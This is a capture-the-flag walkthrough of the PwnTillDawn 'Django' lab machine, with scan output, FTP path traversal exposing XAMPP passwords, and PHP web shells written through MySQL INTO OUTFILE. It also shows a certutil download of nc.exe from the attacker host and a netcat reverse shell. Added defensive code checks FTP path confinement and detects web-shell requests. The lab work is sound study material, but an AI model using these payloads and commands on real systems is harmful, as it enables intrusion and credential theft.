First we start with an nmap scan
E:\PENTEST\NMAP>nmap -vv -A 10.150.150.212
WARNING: Could not import all necessary Npcap functions. You may need to upgrade to the latest version from http://www.npcap.org. Resorting to connect() mode -- Nmap may not function completely
Starting Nmap 7.70 ( https://nmap.org ) at 2020-08-20 13:18 W. Europe Summer Time
NSE: Loaded 148 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 2) scan.
Initiating NSE at 13:18
Completed NSE at 13:18, 0.00s elapsed
NSE: Starting runlevel 2 (of 2) scan.
Initiating NSE at 13:18
Completed NSE at 13:18, 0.00s elapsed
Initiating Ping Scan at 13:18
Scanning 10.150.150.212 [2 ports]
Completed Ping Scan at 13:18, 0.03s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 13:18
Completed Parallel DNS resolution of 1 host. at 13:18, 0.01s elapsed
Initiating Connect Scan at 13:18
Scanning 10.150.150.212 [1000 ports]
Discovered open port 443/tcp on 10.150.150.212
Discovered open port 3306/tcp on 10.150.150.212
Discovered open port 21/tcp on 10.150.150.212
Discovered open port 139/tcp on 10.150.150.212
Discovered open port 80/tcp on 10.150.150.212
Discovered open port 445/tcp on 10.150.150.212
Discovered open port 135/tcp on 10.150.150.212
Discovered open port 49157/tcp on 10.150.150.212
Discovered open port 49152/tcp on 10.150.150.212
Discovered open port 49158/tcp on 10.150.150.212
Discovered open port 49154/tcp on 10.150.150.212
Discovered open port 8089/tcp on 10.150.150.212
Discovered open port 49153/tcp on 10.150.150.212
Discovered open port 49155/tcp on 10.150.150.212
Completed Connect Scan at 13:19, 44.10s elapsed (1000 total ports)
Initiating Service scan at 13:19
Scanning 14 services on 10.150.150.212
Service scan Timing: About 64.29% done; ETC: 13:20 (0:00:30 remaining)
Completed Service scan at 13:20, 59.02s elapsed (14 services on 1 host)
NSE: Script scanning 10.150.150.212.
NSE: Starting runlevel 1 (of 2) scan.
Initiating NSE at 13:20
NSE Timing: About 99.95% done; ETC: 13:20 (0:00:00 remaining)
Completed NSE at 13:20, 38.83s elapsed
NSE: Starting runlevel 2 (of 2) scan.
Initiating NSE at 13:20
Completed NSE at 13:20, 0.00s elapsed
Nmap scan report for 10.150.150.212
Host is up, received syn-ack (0.032s latency).
Scanned at 2020-08-20 13:18:29 W. Europe Summer Time for 144s
Not shown: 986 filtered ports
Reason: 986 no-responses
PORT      STATE SERVICE      REASON  VERSION
21/tcp    open  ftp          syn-ack
| fingerprint-strings:
|   GenericLines:
|     220-Wellcome to Home Ftp Server!
|     Server ready.
|     command not understood.
|     command not understood.
|   Help:
|     220-Wellcome to Home Ftp Server!
|     Server ready.
|     'HELP': command not understood.
|   NULL, SMBProgNeg:
|     220-Wellcome to Home Ftp Server!
|     Server ready.
|   SSLSessionReq:
|     220-Wellcome to Home Ftp Server!
|     Server ready.
|_    command not understood.
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| drw-rw-rw-   1 ftp      ftp             0 Mar 26  2019 . [NSE: writeable]
| drw-rw-rw-   1 ftp      ftp             0 Mar 26  2019 .. [NSE: writeable]
| drw-rw-rw-   1 ftp      ftp             0 Mar 13  2019 FLAG [NSE: writeable]
| -rw-rw-rw-   1 ftp      ftp         34419 Mar 26  2019 xampp-control.log [NSE: writeable]
|_-rw-rw-rw-   1 ftp      ftp           881 Nov 13  2018 zen.txt [NSE: writeable]
| ftp-syst:
|_  SYST: Internet Component Suite
80/tcp    open  http         syn-ack Apache httpd 2.4.34 ((Win32) OpenSSL/1.0.2o PHP/5.6.38)
|_http-favicon: Unknown favicon MD5: 56F7C04657931F2D0B79371B2D6E9820
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.34 (Win32) OpenSSL/1.0.2o PHP/5.6.38
| http-title: Welcome to XAMPP
|_Requested resource was http://10.150.150.212/dashboard/
135/tcp   open  msrpc        syn-ack Microsoft Windows RPC
139/tcp   open  netbios-ssn  syn-ack Microsoft Windows netbios-ssn
443/tcp   open  ssl/http     syn-ack Apache httpd 2.4.34 ((Win32) OpenSSL/1.0.2o PHP/5.6.38)
|_http-favicon: Unknown favicon MD5: 6EB4A43CB64C97F76562AF703893C8FD
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.34 (Win32) OpenSSL/1.0.2o PHP/5.6.38
| http-title: Welcome to XAMPP
|_Requested resource was https://10.150.150.212/dashboard/
| ssl-cert: Subject: commonName=localhost
| Issuer: commonName=localhost
| Public Key type: rsa
| Public Key bits: 1024
| Signature Algorithm: sha1WithRSAEncryption
| Not valid before: 2009-11-10T23:48:47
| Not valid after:  2019-11-08T23:48:47
| MD5:   a0a4 4cc9 9e84 b26f 9e63 9f9e d229 dee0
|_SHA-1: b023 8c54 7a90 5bfa 119c 4e8b acca eacf 3649 1ff6
|_ssl-date: TLS randomness does not represent time
| tls-alpn:
|   http/1.1
|_  http/1.1
445/tcp   open  microsoft-ds syn-ack Windows 7 Home Basic 7601 Service Pack 1 microsoft-ds (workgroup: PWNTILLDAWN)
3306/tcp  open  mysql        syn-ack MariaDB (unauthorized)
8089/tcp  open  ssl/http     syn-ack Splunkd httpd
| http-methods:
|_  Supported Methods: GET HEAD OPTIONS
| http-robots.txt: 1 disallowed entry
|_/
|_http-server-header: Splunkd
|_http-title: splunkd
| ssl-cert: Subject: commonName=SplunkServerDefaultCert/organizationName=SplunkUser
| Issuer: commonName=SplunkCommonCA/organizationName=Splunk/stateOrProvinceName=CA/countryName=US/emailAddress=support@splunk.com/localityName=San Francisco
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2019-10-29T14:31:26
| Not valid after:  2022-10-28T14:31:26
| MD5:   5d60 c8e6 37f3 eea2 1ca0 3cd3 bbae 8193
|_SHA-1: 0c85 65c6 0e58 49e7 1882 b403 40f4 b521 6360 8ba9
49152/tcp open  msrpc        syn-ack Microsoft Windows RPC
49153/tcp open  msrpc        syn-ack Microsoft Windows RPC
49154/tcp open  msrpc        syn-ack Microsoft Windows RPC
49155/tcp open  msrpc        syn-ack Microsoft Windows RPC
49157/tcp open  msrpc        syn-ack Microsoft Windows RPC
49158/tcp open  msrpc        syn-ack Microsoft Windows RPC
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
Service Info: Hosts: Wellcome, DJANGO; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 56m57s, deviation: 1s, median: 56m56s
| p2p-conficker:
|   Checking for Conficker.C or higher...
|   Check 1 (port 18317/tcp): CLEAN (Timeout)
|   Check 2 (port 19575/tcp): CLEAN (Timeout)
|   Check 3 (port 8595/udp): CLEAN (Timeout)
|   Check 4 (port 51927/udp): CLEAN (Timeout)
|_  0/4 checks are positive: Host is CLEAN or ports are blocked
| smb-os-discovery:
|   OS: Windows 7 Home Basic 7601 Service Pack 1 (Windows 7 Home Basic 6.1)
|   OS CPE: cpe:/o:microsoft:windows_7::sp1
|   Computer name: Django
|   NetBIOS computer name: DJANGO\x00
|   Workgroup: PWNTILLDAWN\x00
|_  System time: 2020-08-20T12:17:14+00:00
| smb-security-mode:
|   account_used: <blank>
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode:
|   2.02:
|_    Message signing enabled but not required
| smb2-time:
|   date: 2020-08-20 14:17:18
|_  start_date: 2020-04-02 16:41:43

NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 2) scan.
Initiating NSE at 13:20
Completed NSE at 13:20, 0.00s elapsed
NSE: Starting runlevel 2 (of 2) scan.
Initiating NSE at 13:20
Completed NSE at 13:20, 0.00s elapsed
Read data files from: E:\PENTEST\NMAP
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 147.40 seconds
E:\PENTEST\NMAP>
kali@kali:~/ptd$ gobuster dir -k --wordlist /usr/share/wordlists/dirb/big.txt --url https://10.150.150.212
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            https://10.150.150.212
[+] Threads:        10
[+] Wordlist:       /usr/share/wordlists/dirb/big.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Timeout:        10s
===============================================================
2020/08/20 07:38:08 Starting gobuster
===============================================================
/.htaccess (Status: 403)
/.htpasswd (Status: 403)
/aux (Status: 403)
/cgi-bin/ (Status: 403)
/com1 (Status: 403)
/com2 (Status: 403)
/com3 (Status: 403)
/com4 (Status: 403)
/con (Status: 403)
/dashboard (Status: 301)
/favicon.ico (Status: 200)
/img (Status: 301)
/licenses (Status: 403)
/lpt1 (Status: 403)
/lpt2 (Status: 403)
/nul (Status: 403)
/phpmyadmin (Status: 301)
/prn (Status: 403)
/secci (Status: 403)
/server-info (Status: 403)
/server-status (Status: 403)
/webalizer (Status: 403)
/xampp (Status: 301)
===============================================================
2020/08/20 07:40:25 Finished
===============================================================
kali@kali:~/ptd$
kali@kali:~/ptd$ mysql -u root -p 10.150.150.212
Enter password:thebarrierbetween
ERROR 2002 (HY000): Can't connect to local MySQL server through socket '/var/run/mysqld/mysqld.sock' (2)
-> to test from kali2do
kali@kali:~/ptd$ nmap --script smb-vuln-* 10.150.150.212 Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-20 08:18 EDT
E:\PENTEST\PTD>type xampp-control.log | findstr pass
3:11:25 PM [main] XAMPP Password Written in: "c:\xampp\passwords.txt"
E:\PENTEST\PTD>ftp 10.150.150.212
Connected to 10.150.150.212.
220-Wellcome to Home Ftp Server!
220 Server ready.
530 Please login with USER and PASS.
User (10.150.150.212:(none)): anonymous
331 Password required for anonymous.
Password:
230 User Anonymous logged in.
ftp> get ../xampp/passwords.txt
200 Port command successful.
150 Opening data connection for ../xampp/passwords.txt.
226 File sent ok
ftp: 816 bytes received in 0.16Seconds 5.07Kbytes/sec.
ftp> quit
221 Goodbye.
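The get ../xampp/passwords.txt above works because Home Ftp Server joins the client's path onto the anonymous root without checking that the result stays inside it. The following is an added example of the confinement check an FTP server should perform; it is not code from the write-up or from Home Ftp Server, and the root C:\ftproot is an assumed value.

```python
# Added example, not from the write-up: confine FTP path arguments to the
# server's root so a request like "get ../xampp/passwords.txt" is refused.
from pathlib import PureWindowsPath
from typing import Optional

# Assumed anonymous FTP root; the real path on the target is not known from the scan.
FTP_ROOT = PureWindowsPath(r"C:\ftproot")


def resolve_in_root(root: PureWindowsPath, requested: str) -> Optional[str]:
    """Map a client-supplied FTP path onto the filesystem.

    Returns the absolute path if it stays under `root`, or None if the
    request would escape it. Both "/" and "\\" count as separators, ".."
    is resolved component by component before anything is joined, and
    drive letters are rejected outright, so a traversal cannot be hidden
    behind a leading slash or a mixed separator style.
    """
    parts = []
    for piece in requested.replace("\\", "/").split("/"):
        if piece in ("", "."):
            continue            # empty (leading/double slash) or current dir
        if piece == "..":
            if not parts:
                return None     # would climb above the root: refuse
            parts.pop()
            continue
        if ":" in piece:
            return None         # "C:" style drive references are never valid
        parts.append(piece)
    return str(root.joinpath(*parts))


if __name__ == "__main__":
    for req in ("FLAG/flag.txt", "/zen.txt", "../xampp/passwords.txt", r"..\..\xampp\passwords.txt"):
        print(f"{req!r:35} -> {resolve_in_root(FTP_ROOT, req)}")
```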
E:\PENTEST\PTD>type passwords.txt
### XAMPP Default Passwords ###
1) MySQL (phpMyAdmin):
User: root
Password:thebarrierbetween
2) FileZilla FTP:
[ You have to create a new user on the FileZilla Interface ]
3) Mercury (not in the USB & lite version):
Postmaster: Postmaster (postmaster@localhost)
Administrator: Admin (admin@localhost)
User: newuser
Password: wampp
4) WEBDAV:
User: xampp-dav-unsecure
Password: ppmax2011
Attention: WEBDAV is not active since XAMPP Version 1.7.4.
For activation please comment out the httpd-dav.conf and
following modules in the httpd.conf
LoadModule dav_module modules/mod_dav.so
LoadModule dav_fs_module modules/mod_dav_fs.so
Please do not forget to refresh the WEBDAV authentification (users and passwords).
E:\PENTEST\PTD>
You don't need a password. From phpMyAdmin, use an SQL statement with INTO OUTFILE to write a PHP shell onto the server.
The database is named flag18_ad1357d394eba91febe5a6d33dd3ec6dd0abc056
mysql> select "<?php eval($_POST['puckie'])?>" into outfile 'C:/xampp/webshell.php';
Query OK, 1 row affected (0.00 sec)
SELECT "<?php system($_GET['cmd']); ?>" into outfile "C:\\xampp\\htdocs\\backdoor.php"
http://10.150.150.212/backdoor.php?cmd=whoami
http://10.150.150.212/backdoor.php?cmd=dir%20c:\users\chuck.norris\desktop
flag11 = 7a763d39f68ece1edd1037074ff8d129451af0b1
http://10.150.150.212/backdoor.php?cmd=mkdir /temp
http://10.150.150.212/backdoor.php?cmd=certutil -urlcache -split -f "http://10.66.66.94/nc.exe" c:\\temp\nc.exe
http://10.150.150.212/backdoor.php?cmd=c:\\temp\nc.exe 10.66.66.94 53 -e cmd.exe
E:\PENTEST>nc -nlvp 53
listening on [any] 53 ...
connect to [10.66.66.94] from (UNKNOWN) [10.150.150.212] 49269
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\xampp\htdocs>whoami
whoami
django\chuck.norris

c:\Users\chuck.norris\Desktop>type flag11.txt
type flag11.txt
7a763d39f68ece1edd1037074ff8d129451af0b1

c:\xampp>type flag20.txt
type flag20.txt
a9435c140b6667cf2f24fcf6a9a1ea6b8574c3e7
certutil -urlcache -split -f "http://10.66.66.94/pwdump7.exe" c:\\temp\pwdump7.exe
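A detection-side counterpart to the backdoor.php requests above, added here as an example and not part of the write-up: it parses Apache combined-format access log lines (the sample lines are constructed to mirror this walkthrough's requests) and flags shell commands passed through a web-shell parameter. The parameter names and command keywords are assumptions chosen from what appears on this page.

```python
# Added detection example, not part of the write-up: flag requests that drive
# a one-line PHP shell (backdoor.php?cmd=...) in an Apache combined-format log.
import re
from urllib.parse import urlsplit, parse_qsl

# Command words seen in the walkthrough above that rarely belong in a query string.
SHELL_MARKERS = re.compile(
    r"\b(whoami|certutil|cmd\.exe|nc\.exe|powershell|net\s+user|mkdir|dir|type\s+\S+\.txt)\b",
    re.IGNORECASE)
# Parameter names typically used by one-line shells ("cmd" and "puckie" come from this page).
SHELL_PARAMS = {"cmd", "c", "exec", "command", "puckie"}
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
                    r'"(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3})')


def inspect_line(line):
    """Return (client_ip, path, "param=decoded value") for a shell-like request, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None                       # not an access-log line we understand
    url = urlsplit(m.group("target"))
    # parse_qsl percent-decodes, so "dir%20c:\users" is inspected as "dir c:\users"
    for name, value in parse_qsl(url.query, keep_blank_values=True):
        if name.lower() in SHELL_PARAMS and SHELL_MARKERS.search(value):
            return (m.group("ip"), url.path, f"{name}={value}")
    return None


def scan(lines):
    """Run inspect_line over every line and keep the hits, in log order."""
    return [hit for hit in map(inspect_line, lines) if hit is not None]


# Constructed sample log, modelled on the requests made in this write-up.
SAMPLE_LOG = [
    r'10.66.66.94 - - [20/Aug/2020:14:20:01 +0200] "GET /dashboard/ HTTP/1.1" 200 7544 "-" "Mozilla/5.0"',
    r'10.66.66.94 - - [20/Aug/2020:14:21:10 +0200] "GET /backdoor.php?cmd=whoami HTTP/1.1" 200 21 "-" "Mozilla/5.0"',
    r'10.66.66.94 - - [20/Aug/2020:14:21:45 +0200] "GET /backdoor.php?cmd=dir%20c:\users\chuck.norris\desktop HTTP/1.1" 200 412 "-" "Mozilla/5.0"',
    r'10.66.66.94 - - [20/Aug/2020:14:23:02 +0200] "GET /backdoor.php?cmd=certutil%20-urlcache%20-split%20-f%20http://10.66.66.94/nc.exe%20c:\temp\nc.exe HTTP/1.1" 200 88 "-" "Mozilla/5.0"',
    r'10.66.66.94 - - [20/Aug/2020:14:25:00 +0200] "GET /phpmyadmin/index.php?db=test&cmd=1 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for ip, path, reason in scan(SAMPLE_LOG):
        print(f"{ip} {path} {reason}")
```

The last sample line shows why both conditions are required: a parameter merely named cmd with a harmless value is not reported.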
Write-ups have been authorized for this machine by the PwnTillDawn Crew! We are just asking you to give us credit by adding a backlink to https://www.wizlynxgroup.com/ and https://online.pwntilldawn.com/ in your write-up.